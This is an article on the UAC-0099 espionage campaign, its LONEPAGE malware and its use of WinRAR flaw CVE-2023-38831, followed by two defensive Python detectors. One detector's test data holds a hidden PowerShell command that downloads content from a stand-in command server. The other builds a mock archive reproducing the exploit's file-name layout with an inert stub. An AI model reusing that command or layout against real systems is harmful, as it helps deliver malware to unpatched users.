UAC-0099, a threat actor tracked by CERT-UA, has been targeting Ukrainian employees of organizations based outside of Ukraine since 2022 [1] [2] [4] [5] [6] [8] [9] [10] [11]. Among other delivery methods, the group exploits a high-severity WinRAR vulnerability, CVE-2023-38831, which lets an attacker execute arbitrary code when a user tries to open a seemingly benign file inside a ZIP archive [3] [5] [9] [10]. The flaw has been patched (WinRAR 6.23, released in August 2023), but many users still run older versions and remain exposed.

Description

UAC-0099 employs three different infection methods: HTA attachments, self-extracting (SFX) archives, and booby-trapped ZIP files [1] [2] [4] [6] [8] [10]. Victims are lured into opening a seemingly harmless ZIP file, which in turn launches PowerShell with malicious content [7]; fabricated court summons have been used as the lure document [7]. The attacks begin with phishing emails carrying file attachments and end with the installation of the LONEPAGE malware. LONEPAGE starts a hidden PowerShell process that contacts a hardcoded URL to retrieve a text file [7]; through it the group communicates with a command-and-control server and downloads additional payloads such as keyloggers, stealers and screenshot malware [3] [6] [8] [11].
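The persistence and retrieval steps described here (a scheduled task that runs a VBS file, and the hidden PowerShell process LONEPAGE uses to pull a text file from a hardcoded URL) are worth a host-side check. The following is an added example, not code from the original page or from Deep Instinct or CERT-UA: a small Python detector run over constructed process-creation events. The event records, the task name, the script path and the URL are all invented for the test; the field names are only modelled on Sysmon Event ID 1 and would need mapping to a real telemetry source.

```python
import json
import re
from typing import Dict, List, Tuple

# Constructed process-creation events in JSON-lines form. Field names loosely follow
# Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, ParentImage, CommandLine).
# The task name, script path and URL are invented for this test; they are not
# indicators taken from any report on UAC-0099.
SAMPLE_EVENTS = r'''
{"pid": 4120, "ppid": 3300, "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "schtasks.exe /create /tn SysUpdate /sc minute /mo 3 /tr \"wscript.exe C:\\Users\\Public\\update.vbs\""}
{"pid": 5204, "ppid": 1012, "image": "C:\\Windows\\System32\\wscript.exe", "parent_image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "wscript.exe C:\\Users\\Public\\update.vbs"}
{"pid": 5220, "ppid": 5204, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\System32\\wscript.exe", "cmdline": "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient).DownloadString('http://c2.example.invalid/tasks.txt')\""}
{"pid": 6001, "ppid": 2200, "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -NoProfile -Command Get-Process"}
{"pid": 6002, "ppid": 2200, "image": "C:\\Windows\\System32\\schtasks.exe", "parent_image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "schtasks.exe /create /tn NightlyBackup /sc daily /st 02:00 /tr C:\\Tools\\backup.exe"}
'''

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
POWERSHELL = ("powershell.exe", "pwsh.exe")
# -w hidden, -win hidden, -windowstyle hidden: PowerShell accepts abbreviated parameter names
HIDDEN_WINDOW = re.compile(r"-w[a-z]*\s+hidden", re.I)
DOWNLOAD_PRIMITIVE = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer", re.I)
URL = re.compile(r"https?://", re.I)
TASK_CREATE = re.compile(r"/create\b", re.I)
TASK_ACTION = re.compile(r"/tr\s+(\"[^\"]*\"|\S+)", re.I)   # the /tr value, quoted or bare
VBS_PATH = re.compile(r"[a-z]:\\[^\s\"]+\.vbs", re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_events(text: str) -> List[Dict]:
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def evaluate(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule_name, pid) pairs, in event order, for the LONEPAGE-style chain:
    schtasks creating a VBS task -> script host running that VBS -> hidden PowerShell
    fetching content from a URL."""
    alerts: List[Tuple[str, int]] = []
    scheduled_vbs: set = set()          # .vbs paths registered by observed task creations
    for ev in events:
        image = basename(ev["image"])
        parent = basename(ev["parent_image"])
        cmd = ev["cmdline"]

        if image == "schtasks.exe" and TASK_CREATE.search(cmd):
            m = TASK_ACTION.search(cmd)
            action = m.group(1).lower() if m else ""
            if any(host in action for host in SCRIPT_HOSTS) or action.endswith((".vbs", '.vbs"')):
                alerts.append(("vbs_scheduled_task_created", ev["pid"]))
                scheduled_vbs.update(p.lower() for p in VBS_PATH.findall(action))

        elif image in SCRIPT_HOSTS:
            # A script host running a .vbs that an earlier task creation pointed at.
            if any(path in cmd.lower() for path in scheduled_vbs):
                alerts.append(("scheduled_vbs_executed", ev["pid"]))

        elif image in POWERSHELL:
            if HIDDEN_WINDOW.search(cmd) and DOWNLOAD_PRIMITIVE.search(cmd) and URL.search(cmd):
                alerts.append(("hidden_powershell_url_fetch", ev["pid"]))
            if parent in SCRIPT_HOSTS:
                alerts.append(("script_host_spawned_powershell", ev["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in evaluate(parse_events(SAMPLE_EVENTS)):
        print(f"{rule:32} pid={pid}")
```

The two benign records (an interactive `Get-Process` and a daily backup task) produce nothing; the three malicious ones produce four alerts, two of them on the same PowerShell process. In production the rules are more useful as a correlated sequence than as isolated hits, since hidden PowerShell and script-host parents each occur in legitimate automation.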

UAC-0099 has been conducting targeted cyber-espionage operations against Ukrainian organizations, gaining unauthorized remote access to compromised systems [3]. The group distributes malicious files by email and messaging apps, infects systems with LONEPAGE, then downloads further malware and compromises privileged accounts [3]. CERT-UA advises organizations and users to restrict the legitimate components the attack chain relies on (PowerShell and the script hosts that run HTA and VBS files), monitor network traffic, scan for malware, change the passwords of compromised accounts, and apply security patches and updates [3].

Deep Instinct, a cybersecurity firm, has attributed these attacks to UAC-0099 [1] [5] [6] [8] [9] [10]. CERT-UA first documented the group in June 2023, when it was targeting state organizations and media entities for espionage [6] [8]. The attack chains involve phishing messages carrying HTA, RAR and LNK attachments that lead to the deployment of LONEPAGE [6] [8] [10] [11], a Visual Basic Script (VBS) malware that contacts a command-and-control server to retrieve additional payloads such as keyloggers, stealers and screenshot malware [3] [6] [8] [11]. Deep Instinct's analysis identifies three infection methods: HTA attachments, self-extracting (SFX) archives, and booby-trapped ZIP files [1] [2] [4] [6] [8] [10] [11]. The latter two exploit the WinRAR vulnerability (CVE-2023-38831) to deliver LONEPAGE [6] [10]. The attacks rely on PowerShell and on the creation of a scheduled task that executes a VBS file [6] [8] [10] [11].
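Because the SFX and ZIP lures depend on CVE-2023-38831, archives arriving at a mail gateway or sitting on a file share can be checked for the layout the flaw relies on: a top-level decoy whose name ends in a space, plus a same-named directory holding a script or executable, which WinRAR before 6.23 extracts and runs together when the user double-clicks the decoy. The Python scanner below is an added example, not code from the original page, Deep Instinct or CERT-UA. It handles ZIP archives only (the standard library has no RAR reader); the test archive it builds is constructed with an inert text stub rather than a payload, and all file names in it are invented.

```python
import io
import zipfile
from typing import Dict, List

# Extensions that Windows' ShellExecute will run when they sit beside the decoy;
# the published CVE-2023-38831 pattern used a .cmd file.
EXEC_EXTENSIONS = (".cmd", ".bat", ".exe", ".com", ".scr", ".pif",
                   ".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".ps1", ".lnk")


def find_cve_2023_38831_pattern(zip_bytes: bytes) -> List[Dict[str, str]]:
    """Flag top-level entries whose name ends in a space and which also exist as a
    directory holding a script/executable: the layout that triggers CVE-2023-38831
    in WinRAR before 6.23 when the user double-clicks the decoy."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    files = [n for n in names if not n.endswith("/")]
    findings: List[Dict[str, str]] = []
    for decoy in files:
        if "/" in decoy or not decoy.endswith(" "):
            continue                                  # only top-level, trailing-space names
        prefix = decoy.lower() + "/"                  # NTFS names compare case-insensitively
        children = [n for n in files
                    if n.lower().startswith(prefix) and "/" not in n[len(prefix):]]
        for child in children:
            findings.append({
                "decoy": decoy,
                "payload": child,
                "confidence": "high" if child.lower().endswith(EXEC_EXTENSIONS) else "medium",
            })
    return findings


def build_sample_archive() -> bytes:
    """Constructed test archive mirroring the published layout. The 'payload' entry
    is an inert text stub, not a working exploit; names are invented."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.pdf ", b"%PDF-1.4 decoy contents")
        zf.writestr("invoice.pdf /invoice.pdf .cmd", b"rem inert stub for detection testing\r\n")
        zf.writestr("readme.txt", b"unrelated benign file")
    return buf.getvalue()


def build_benign_archive() -> bytes:
    """Constructed archive with an ordinary nested layout; must produce no findings."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 real report")
        zf.writestr("attachments/notes.txt", b"plain text")
    return buf.getvalue()


def scan_file(path: str) -> List[Dict[str, str]]:
    """Scan an on-disk .zip (mail quarantine, share crawl, etc.) without extracting it."""
    with open(path, "rb") as fh:
        return find_cve_2023_38831_pattern(fh.read())


if __name__ == "__main__":
    for hit in find_cve_2023_38831_pattern(build_sample_archive()):
        print(f"[{hit['confidence']}] decoy={hit['decoy']!r} payload={hit['payload']!r}")
    print("benign archive:", find_cve_2023_38831_pattern(build_benign_archive()))
```

The scanner never extracts anything, which matters here: extracting such an archive on Windows would itself be the trigger. A "medium" finding (same-name directory, but a child without a known executable extension) is still worth quarantining, since the file-and-directory name collision has no legitimate use.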

Conclusion

These espionage operations give UAC-0099 remote access to compromised systems and to the data of the organizations behind them. To mitigate the risk, organizations and users should restrict the legitimate components the attack chain abuses, monitor network traffic, scan for malware, change the passwords of compromised accounts, and apply security patches and updates, including the WinRAR fix for CVE-2023-38831 [3]. CERT-UA's identification of UAC-0099 and Deep Instinct's analysis provide valuable insight into the group's methods and the vulnerabilities it exploits; organizations and security teams should stay vigilant and adapt their defenses to counter future attacks.

References

[1] https://healsecurity.com/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware/
[2] https://gridinsoft.com/blogs/uac-0099-ukrainian-companies-lonepage/
[3] https://iaqaba.com/winrar-flaw-exploited-by-uac-0099-hackers-to-spy-on-ukrainian-firms/
[4] https://cybermaterial.com/ukrainian-firms-targeted-by-winrar-exploit/
[5] https://gixtools.net/2023/12/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware/
[6] https://ciso2ciso.com/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware-sourcethehackernews-com/
[7] https://www.hackread.com/uac-0099-hackers-winrar-flaw-cyberattack-ukraine/
[8] https://mrhacker.co/vulnerabilities/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware
[9] https://cyber.vumetric.com/security-news/2023/12/22/uac-0099-using-winrar-exploit-to-target-ukrainian-firms-with-lonepage-malware/
[10] https://vulnera.com/newswire/uac-0099-exploits-winrar-vulnerability-to-launch-lonepage-malware-attacks-on-ukrainian-firms/
[11] https://thehackernews.com/2023/12/uac-0099-using-winrar-exploit-to-target.html